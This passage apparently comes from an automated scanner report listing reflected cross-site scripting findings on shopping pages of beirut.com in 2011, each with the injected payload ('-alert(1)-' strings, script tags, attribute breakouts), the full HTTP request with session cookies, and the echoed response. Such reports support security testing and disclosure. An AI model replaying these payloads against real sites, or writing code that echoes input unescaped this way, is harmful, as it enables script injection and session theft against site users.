Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Home-Furnishings/4120758082/Home-Fixtures/65a2b82'-alert(1)-'1ec06449d9f';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1024. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea5f6"><a>12de46391a1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppingea5f6"><a>12de46391a1/Home-Furnishings/4120758082/KitchenHouse-Utensils/59 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:01:47 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppingea5f6"><a>12de46391a1">
...[SNIP]...

4.1025. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83ffa'-alert(1)-'9eaaa7729ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping83ffa'-alert(1)-'9eaaa7729ee/Home-Furnishings/4120758082/KitchenHouse-Utensils/59 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:11:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping83ffa'-alert(1)-'9eaaa7729ee/Home-Furnishings/4120758082/KitchenHouse-Utensils/59';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1026. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd6d7'-alert(1)-'d285782c34e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishingsfd6d7'-alert(1)-'d285782c34e/4120758082/KitchenHouse-Utensils/59 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:15:00 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Home-Furnishingsfd6d7'-alert(1)-'d285782c34e/4120758082/KitchenHouse-Utensils/59';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1027. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ab586<script>alert(1)</script>4355b8db918 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Home-Furnishingsab586<script>alert(1)</script>4355b8db918/4120758082/KitchenHouse-Utensils/59 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:15:30 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Home Furnishingsab586<script>alert(1)</script>4355b8db918 <a href="#" id="backlink">
...[SNIP]...

4.1028. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d103'-alert(1)-'4eab40094b6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings/41207580826d103'-alert(1)-'4eab40094b6/KitchenHouse-Utensils/59 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:20:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Home-Furnishings/41207580826d103'-alert(1)-'4eab40094b6/KitchenHouse-Utensils/59';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1029. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20cc7'-alert(1)-'62a91cb3154 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils20cc7'-alert(1)-'62a91cb3154/59 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:26:03 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils20cc7'-alert(1)-'62a91cb3154/59';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1030. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 539a8'-alert(1)-'a6628b9a17d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59539a8'-alert(1)-'a6628b9a17d HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:32:20 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59539a8'-alert(1)-'a6628b9a17d';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1031. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tapistry/50 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Tapistry/50

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6cac4'-alert(1)-'3f7af3835c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping6cac4'-alert(1)-'3f7af3835c1/Home-Furnishings/4120758082/Tapistry/50 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:27:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping6cac4'-alert(1)-'3f7af3835c1/Home-Furnishings/4120758082/Tapistry/50';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1032. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tapistry/50 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Tapistry/50

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57b69"><a>fb485ccb691 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping57b69"><a>fb485ccb691/Home-Furnishings/4120758082/Tapistry/50 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:19:01 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping57b69"><a>fb485ccb691">
...[SNIP]...

4.1033. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tapistry/50 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Tapistry/50

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93c8b'-alert(1)-'d454699a4c0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings93c8b'-alert(1)-'d454699a4c0/4120758082/Tapistry/50 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:32:10 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Home-Furnishings93c8b'-alert(1)-'d454699a4c0/4120758082/Tapistry/50';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1034. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tapistry/50 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Tapistry/50

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a6e66<script>alert(1)</script>3dbb24eb2ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Home-Furnishingsa6e66<script>alert(1)</script>3dbb24eb2ec/4120758082/Tapistry/50 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:32:43 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59748

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Home Furnishingsa6e66<script>alert(1)</script>3dbb24eb2ec <a href="#" id="backlink">
...[SNIP]...

4.1035. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tapistry/50 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Tapistry/50

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0da9'-alert(1)-'32c6966655f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings/4120758082d0da9'-alert(1)-'32c6966655f/Tapistry/50 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:40:11 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Home-Furnishings/4120758082d0da9'-alert(1)-'32c6966655f/Tapistry/50';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1036. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tapistry/50 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Tapistry/50

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b065'-alert(1)-'1624f652c94 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings/4120758082/Tapistry2b065'-alert(1)-'1624f652c94/50 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
